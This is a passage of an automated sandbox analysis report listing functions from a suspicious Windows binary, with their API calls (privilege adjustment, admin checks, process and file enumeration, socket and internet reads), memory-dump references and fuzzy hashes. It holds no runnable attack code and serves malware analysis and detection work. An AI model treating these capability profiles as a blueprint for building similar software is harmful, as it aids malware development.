                                                                        • SetBkColor.GDI32(?,00000000), ref: 00891A61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ColorProc
                                                                        • String ID:
                                                                        • API String ID: 2497529308-0
                                                                        • Opcode ID: a34ca322514000ca918e6e5fd03190e276e153613734aeca91626323b6d276e3
                                                                        • Instruction ID: 5475ed8cd54e18c8c95650ecdb48d48ab2741171c526c59f852a53a86bd1c280
                                                                        • Opcode Fuzzy Hash: a34ca322514000ca918e6e5fd03190e276e153613734aeca91626323b6d276e3
                                                                        • Instruction Fuzzy Hash: 377158A121F86EB9ED3476294C4DFBF189DFB82789F5C011DF103D5582DA25CD0192B6
                                                                        Function 008FBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008FBCE6
                                                                        • _wcscmp.LIBCMT ref: 008FBD16
                                                                        • _wcscmp.LIBCMT ref: 008FBD2B
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 008FBD3C
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 008FBD6C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: a2b63a3f356c426d4fe980de0eb7607406dd5ca3581f9e1d64c13584c3625d48
                                                                        • Instruction ID: d21dd28c69f246db263d496cabf5fd8c985a0e91b82b704096e025c55568801e
                                                                        • Opcode Fuzzy Hash: a2b63a3f356c426d4fe980de0eb7607406dd5ca3581f9e1d64c13584c3625d48
                                                                        • Instruction Fuzzy Hash: 7E516D3560460A9FDB14EF68C491EAAB3E4FF49324F14462DEA56C73A1DB30ED04CB92
                                                                        Function 00906747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00907D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00907DB6
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0090679E
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009067C7
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00906800
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0090680D
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00906821
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 99427753-0
                                                                        • Opcode ID: 271293d8960dd199be622da95876236fa8c7b76377e6dfa771ed7ac8a35e72c5
                                                                        • Instruction ID: ed3febb06ff7df1fbb00c3a2e9c669dfb93bbd3af7114af0122220f13161be47
                                                                        • Opcode Fuzzy Hash: 271293d8960dd199be622da95876236fa8c7b76377e6dfa771ed7ac8a35e72c5
                                                                        • Instruction Fuzzy Hash: DD417175A00214AFDF50BF6C8C86F6E77A8EB45714F08846CF959EB2D2DA749D008792
                                                                        Function 008E80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E80C0
                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E80CA
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E80D9
                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008E80E0
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E80F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 44706859-0
                                                                        • Opcode ID: 59a68cf346b75aca9c0bab4a4248efef54039ab555b4137327bdb4fb5588c70b
                                                                        • Instruction ID: 6e304b2a4f72d8d5253a66d37c647431b3046e0a1363fe28a6f6bf2a079fe4d2
                                                                        • Opcode Fuzzy Hash: 59a68cf346b75aca9c0bab4a4248efef54039ab555b4137327bdb4fb5588c70b
                                                                        • Instruction Fuzzy Hash: ACF0C270358208FFEB104FA5EC8CEAB3BACFF4B754B404029F909C2160CB609D02EA60
                                                                        Function 008FC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 008FC432
                                                                        • CoCreateInstance.OLE32(00922D6C,00000000,00000001,00922BDC,?), ref: 008FC44A
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • CoUninitialize.OLE32 ref: 008FC6B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                        • String ID: .lnk
                                                                        • API String ID: 2683427295-24824748
                                                                        • Opcode ID: eefe47d3d4a5e8f5e9b057f155621cfe206708625a9f0695cc64f799be40ec33
                                                                        • Instruction ID: 08a6ce014bf1ff92889e5c8d4f858b6087a95f30814256555e286703585ef2d1
                                                                        • Opcode Fuzzy Hash: eefe47d3d4a5e8f5e9b057f155621cfe206708625a9f0695cc64f799be40ec33
                                                                        • Instruction Fuzzy Hash: 20A11B71108205AFD700EF68C891EAFB7E8FF95354F04492CF196D7192EB71AA49CB62
                                                                        Function 00894B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00894AD0,?,00000000), ref: 00894B45
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00894B57
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: d0808defd76dada6c17772ff1455313eb54f9b4412cc8e0786564a717de7b2cb
                                                                        • Instruction ID: 3eef1ec5bffbdd3080cfc4194eaafd037211e2361ba6562b8203a169f7f5b80a
                                                                        • Opcode Fuzzy Hash: d0808defd76dada6c17772ff1455313eb54f9b4412cc8e0786564a717de7b2cb
                                                                        • Instruction Fuzzy Hash: ADD0C230B1871BDFCB209F72E838B8272E4FF40364B14C839A48AC2150D670D4C0C614
                                                                        Function 008A3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __itow
                                                                        • String ID:
                                                                        • API String ID: 3482036329-0
                                                                        • Opcode ID: 90c4bfd347a57db926f32f48bad3882fb659969c7f497dcee6e9d3f1f9112cea
                                                                        • Instruction ID: 20bd814edd8c1587d755a318958e65542022e1d76b0f0f888dccf52e04ad475f
                                                                        • Opcode Fuzzy Hash: 90c4bfd347a57db926f32f48bad3882fb659969c7f497dcee6e9d3f1f9112cea
                                                                        • Instruction Fuzzy Hash: 522268716083059FDB24DF18C881B6AB7E4FF9A314F14492DF99AD7291EB31E904CB92
                                                                        Function 0090EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0090EE3D
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0090EE4B
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0090EF0B
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0090EF1A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                        • String ID:
                                                                        • API String ID: 2576544623-0
                                                                        • Opcode ID: 4b68a95f79259adc6a1b760bad684fd06897d1e21cf8030f3290e8a37651e1cc
                                                                        • Instruction ID: 5df08a01772e344266723e14feb501aab219cfb5a7f57e9f809c3429443cb2dc
                                                                        • Opcode Fuzzy Hash: 4b68a95f79259adc6a1b760bad684fd06897d1e21cf8030f3290e8a37651e1cc
                                                                        • Instruction Fuzzy Hash: 69516D71508315AFD710EF28D881E6BB7E8FF94710F44482DF595D62A1EB70A908CB92
                                                                        Function 0089FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        • Opcode ID: 1021e8ca4366ff3f6d8ead0b338d1251a91fabe2370f3c0bc323846960d97763
                                                                        • Instruction ID: e5bf236b313d891954b5d29d3696157a4517958d83ca5ebb6feff49d8f288135
                                                                        • Opcode Fuzzy Hash: 1021e8ca4366ff3f6d8ead0b338d1251a91fabe2370f3c0bc323846960d97763
                                                                        • Instruction Fuzzy Hash: 529248706083419FDB24DF18C480B6AB7E1FB86308F14892DE98ADB762D775E845CF92
                                                                        Function 008EE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008EE628
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        • Opcode ID: 4882eecc7cc67f262e53dc53e47b896df3e8b4e97a9d9e2d8dfdf4d07b1213bf
                                                                        • Instruction ID: 72b014d68f72c9bb80be80f15404075c0e707cf43f1a864c055c66fe19dc0c58
                                                                        • Opcode Fuzzy Hash: 4882eecc7cc67f262e53dc53e47b896df3e8b4e97a9d9e2d8dfdf4d07b1213bf
                                                                        • Instruction Fuzzy Hash: 40323575A007059FDB28CF1AC4819AAB7F1FF59320B15C56EE89ADB3A1E770E941CB40
                                                                        Function 009022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0090180A,00000000), ref: 009023E1
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00902418
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: 1383b5903d9a33762fe5bd2d407373e56ec361b47c3bd761c93052fc2894c4e3
                                                                        • Instruction ID: 79293ee2883aaeee2437bfa2032fde5ed93c29701472f91d1efa716205e297df
                                                                        • Opcode Fuzzy Hash: 1383b5903d9a33762fe5bd2d407373e56ec361b47c3bd761c93052fc2894c4e3
                                                                        • Instruction Fuzzy Hash: D441F671A04209BFEB20DF95DC89FBFB7BCEB40714F10406AF605A62D1DB759E41A650
                                                                        Function 008FB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FB40B
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008FB465
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008FB4B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        • Opcode ID: 1dcc788c49bf6df087e484b9ba69ffb29d1f5bf6ee5f90b856e166336e084ed2
                                                                        • Instruction ID: 63f7cbf75b0480c080676b7bac49150688f367703240963c959ede13b91f83bb
                                                                        • Opcode Fuzzy Hash: 1dcc788c49bf6df087e484b9ba69ffb29d1f5bf6ee5f90b856e166336e084ed2
                                                                        • Instruction Fuzzy Hash: F5216D35A1010CEFCB00EFA9D880AEEBBB8FF49314F1480A9E905EB361DB319915CB51
                                                                        Function 008E87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
                                                                          • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
                                                                        • GetLastError.KERNEL32 ref: 008E8865
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: 6b47f3f73a424a885514374e845ff93bba6861ca9cfd5d542f3664d7b96eab16
                                                                        • Instruction ID: 3488a10754928617d4ce475bbc7496d56359df4a4169d4665b68e5bb7ce6eef0
                                                                        • Opcode Fuzzy Hash: 6b47f3f73a424a885514374e845ff93bba6861ca9cfd5d542f3664d7b96eab16
                                                                        • Instruction Fuzzy Hash: ED116DB2514208AFE718DFA5DC85D6BB7A8FB45710B20852EE85997251EA30AC418B60
                                                                        Function 008E874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E8774
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E878B
                                                                        • FreeSid.ADVAPI32(?), ref: 008E879B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 514e1d3d1956eac8b190eee595e68e764a8399ec9ada903ad3286c544ed76806
                                                                        • Instruction ID: 38563aca7a705f8e06892b3d54054b6190df0e9ee3a3acd6eac7ae00c13eb15f
                                                                        • Opcode Fuzzy Hash: 514e1d3d1956eac8b190eee595e68e764a8399ec9ada903ad3286c544ed76806
                                                                        • Instruction Fuzzy Hash: 55F03775A1120CBBDB00DFE49D99AAEBBB8EF08311F5084A9A901E2191E6716A449B50
                                                                        Function 008FC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008FC6FB
                                                                        • FindClose.KERNEL32(00000000), ref: 008FC72B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: ea50e55ae143d0447bdb6292bbc8026f9c71f05d942c0d9af5f686d3d2f40f73
                                                                        • Instruction ID: b306ead3f1591b95c45e7ab7ba90e13d598bb87a62e42d5d03bb6d267513f8cb
                                                                        • Opcode Fuzzy Hash: ea50e55ae143d0447bdb6292bbc8026f9c71f05d942c0d9af5f686d3d2f40f73
                                                                        • Instruction Fuzzy Hash: 4D118E726106089FDB10EF2DC845A6AF7E8FF85324F04892DF9A9D7291DB30A901CF81
                                                                        Function 008FA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00909468,?,0091FB84,?), ref: 008FA097
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00909468,?,0091FB84,?), ref: 008FA0A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: 3a0cba5bdc498482aad7d0c103bac0e8dfe2232152d1ee112f9d3a54b7118ecc
                                                                        • Instruction ID: aa482ba13042dbb25346758cd23212617de0504a0556a65adb3adcb0ad194786
                                                                        • Opcode Fuzzy Hash: 3a0cba5bdc498482aad7d0c103bac0e8dfe2232152d1ee112f9d3a54b7118ecc
                                                                        • Instruction Fuzzy Hash: 61F0823521522DABDB21AFA4DC88FEA776CFF09361F008165F919D7181DA309944CBA2
                                                                        Function 008E81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
